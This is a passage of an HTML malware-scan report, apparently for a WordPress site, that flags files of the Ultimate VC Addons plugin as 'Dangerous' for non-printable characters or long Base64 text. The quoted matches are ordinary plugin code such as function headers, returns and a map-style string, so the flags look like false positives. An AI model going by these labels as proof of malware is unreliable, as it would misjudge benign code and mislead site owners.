</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 224</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$img_size</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 229</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'ultimate_get_box_shadow'</span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 231</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_get_box_shadow</span><span style="color: #007700">( </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$data </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 23</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function: </span><span style="color: #0000BB">ultimate_hex2rgb</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns</span><span style="color: #007700">: </span><span style="color: #0000BB">value with rgba</span><span style="color: #007700">(</span><span style="color: #0000BB">r</span><span style="color: #007700">,</span><span style="color: #0000BB">g</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">,</span><span style="color: #0000BB">opacity</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 30</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'ultimate_hex2rgb'</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_hex2rgb</span><span style="color: #007700">(</span><span style="color: #0000BB">$hex</span><span style="color: #007700">,</span><span style="color: #0000BB">$opacity</span><span style="color: #007700">=</span><span style="color: #0000BB">1</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'bsf_get_option'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">","</span><span style="color: #007700">, </span><span style="color: #0000BB">$rgb</span><span style="color: #007700">); </span><span style="color: #FF8000">// returns the rgb values separated by commas</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns an </span><span style="color: #007700">array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">responsive data</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_option</span><span style="color: #007700">(</span><span style="color: #0000BB">$request </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_ultimate_vc_responsive_media_css</span><span style="color: #007700">(</span><span style="color: #0000BB">$args</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 67</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$content</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 77</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array|</span><span style="color: #0000BB">json</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 79</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'ult_img_single_init'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bsf_options</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 80</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_img_single_init</span><span style="color: #007700">( </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$data </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$size </span><span style="color: #007700">= </span><span style="color: #DD0000">'full' </span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (isset(</span><span style="color: #0000BB">$bsf_options</span><span style="color: #007700">[</span><span style="color: #0000BB">$request</span><span style="color: #007700">])) ? </span><span style="color: #0000BB">$bsf_options</span><span style="color: #007700">[</span><span style="color: #0000BB">$request</span><span style="color: #007700">] : </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_292").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/presets/Ultimate_Google_Maps.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 2.82 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_293" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'JTVCJTBBJTIwJTIwJTdCJTBBJTIwJTIwJTIwJTIwJTIyZmVhdHVyZVR5cGUlMjIlM0ElMjAlMjJsYW5kc2NhcGUubWFuX21hZGUlMjIlMkMlMEElMjAlMjAlMjAlMjAlMjJlbGVtZW50VHlwZSUyMiUzQSUyMCUyMmdlb21ldHJ5JTIyJTJDJTBBJTIwJTIwJTIwJTIwJTIyc3R5bGVycyUyMiUzQSUyMCU1QiUwQSUyMCUyMCUyMCUyMCUyMCUyMCU3QiUyMCUyMnZpc2liaWxpdHklMjIlM0ElMjAlMjJvbiUyMiUyMCU3RCUyQyUwQSUyMCUyMCUyMCUyMCUyMCUyMCU3QiUyMCUyMmNvbG9yJTIyJTNBJTIwJTIyJTIzOWI5NTk1JTIyJTIwJTdEJTBBJTIwJTIwJTIwJTIwJTVEJTBBJTIwJTIwJTdEJTJDJTdCJTBBJTIwJTIwJTIwJTIwJTIyZmVhdHVyZVR5cGUlMjIlM0E...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_293").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_videos.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 42.00 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 23</span><br><table id="file_294" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_Videos</span><span style="color: #007700">; if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'WPBakeryShortCode'</span><span style="color: #007700">) && !</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'WPBakeryShortCode_ultimate_video'</span><span style="color: #007700">)) { class </span><span style="color: #0000BB">WPBakeryShortCode_ultimate_video </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 106</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$thumb</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 114</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_embed_params</span><span style="color: #007700">(</span><span style="color: #0000BB">$setting</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$params</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_videos_module_assets</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 180</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns Vimeo Headers</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 184</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_header_wrap</span><span style="color: #007700">( </span><span style="color: #0000BB">$setting </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 220</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 227</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_video_embed</span><span style="color: #007700">( </span><span style="color: #0000BB">$setting</span><span style="color: #007700">, </span><span style="color: #0000BB">$uid </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_video_id</span><span style="color: #007700">(</span><span style="color: #0000BB">$setting</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 338</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">video module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 339</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_videos_module_init</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 340</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"vc_map"</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$id</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$setting</span><span style="color: #007700">, </span><span style="color: #0000BB">$params </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 77</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$url</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 81</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns Video Thumbnail Image</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 85</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_video_thumb</span><span style="color: #007700">( </span><span style="color: #0000BB">$setting </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 88</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 95</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$img_info</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 979</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_videos_module_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_294").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_functions.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 6.43 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 12</span><br><table id="file_295" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array( </span><span style="color: #DD0000">'name' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$bname</span><span style="color: #007700">, </span><span style="color: #DD0000">'version' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$version</span><span style="color: #007700">, ); } function </span><span style="color: #0000BB">ult_prepareAtts</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) { if ( isset( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$return </span><span style="color: #007700">= </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">( array( </span><span style="color: #DD0000">'``'</span><span style="color: #007700">, ), array( </span><span style="color: #DD0000">'"'</span><span style="color: #007700">, ), </span><span style="color: #0000BB">$atts </span><span style="color: #007700">); } return </span><span style="color: #0000BB">$return</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 177</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_getBrowser</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$json</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 255</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 264</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_prepareAtts</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 266</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return = </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">( array(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 26</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_get_banner2_json</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$return</span><span style="color: #007700">;</span>
</span>
